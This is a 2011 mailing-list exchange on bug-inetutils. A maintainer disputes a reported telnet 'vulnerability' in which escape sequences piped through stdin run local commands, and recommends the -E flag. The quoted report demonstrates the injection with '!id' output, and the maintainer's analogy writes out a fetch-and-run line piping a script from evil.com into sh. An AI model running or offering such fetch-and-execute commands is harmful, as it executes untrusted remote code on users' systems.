[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [bug-inetutils] telnet security advisory
From: |
Simon Josefsson |
Subject: |
Re: [bug-inetutils] telnet security advisory |
Date: |
Mon, 03 Oct 2011 20:11:52 +0200 |
User-agent: |
Gnus/5.110018 (No Gnus v0.18) Emacs/23.2 (gnu/linux) |
sha0 <address@hidden> writes:
> Hi Simon,
>
> I know this is a "feature", but connecting the stdin of telnet with any kind
> of controllable input, will rely en command execution, is a danger default
> option.
I'm not sure I follow -- connecting the stdin of /bin/sh (as root) with
any kind of input controllable by an attacker is equally dangerous.
What difference do you see between that example and your problem?
Also, doesn't the -E parameter work? It should disable the escape
sequence.
> I have also another vulnerability related with stdin parser, is a SIGSEGV,
> i'm studying if I can control the movl to overwrite a memory function
> pointer in order to get execution,
Can you post a backtrace? The telnet interactive prompt parser is most
likely just buggy.
/Simon
> But also the attack vector is stdin, then the attack vector is "rare"
>
>
> regards.
>
>
> 2011/10/3 Simon Josefsson <address@hidden>
>
>> sha0 <address@hidden> writes:
>>
>> > Hello,
>> >
>> > Is posible to inject a scape sequence via stdin to telnet, and arbitrary
>> > comands will be executed,
>>
>> Hi! Thanks for studying InetUtils for security problems. I'm not sure
>> I follow your "attack" though.
>>
>> > for example:
>> >
>> >
>> > # cat evil-file | telnet 127.0.0.1 80
>> > Trying 127.0.0.1...
>> > Connected to 127.0.0.1.
>> > Escape character is '^]'.
>> >
>> > telnet> !id
>> > uid=0(root) gid=0(root)
>> > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),1
>> > 0(wheel),19(log)
>> > Connection closed by foreign host.
>> >
>> >
>> > I think is very dangerous despite of few admins use telnet for moving
>> file
>> > like this
>>
>> Yes it is dangerous, so don't do that. Use ftp to transfer files.
>>
>> > 3. DESCRIPTION
>> > -------------------------
>> > When telnet is used to transfer files to remote tcp port, a very
>> dangerous
>> > vulnerability is present, that lets a remote arbitrary code execution.
>>
>> The attack seems to be based on tricking the local root user into doing
>> something stupid. This is similar to asking the local root user to do
>> 'wget -O - http://evil.com/script | sh'. There is no security bug in
>> wget or sh just because that is possible.
>>
>> > 7. SOLUTION
>> > -------------------------
>> > The stdin parser must filter the 0x9d byte.
>>
>> The ^] escape sequence is a documented feature, so I don't think that is
>> a solution.
>>
>> You can use the command line parameter -E to inhibit the escape
>> character if you want. Quoting 'telnet --help':
>>
>> -E, --no-escape use no escape character
>>
>> /Simon
>>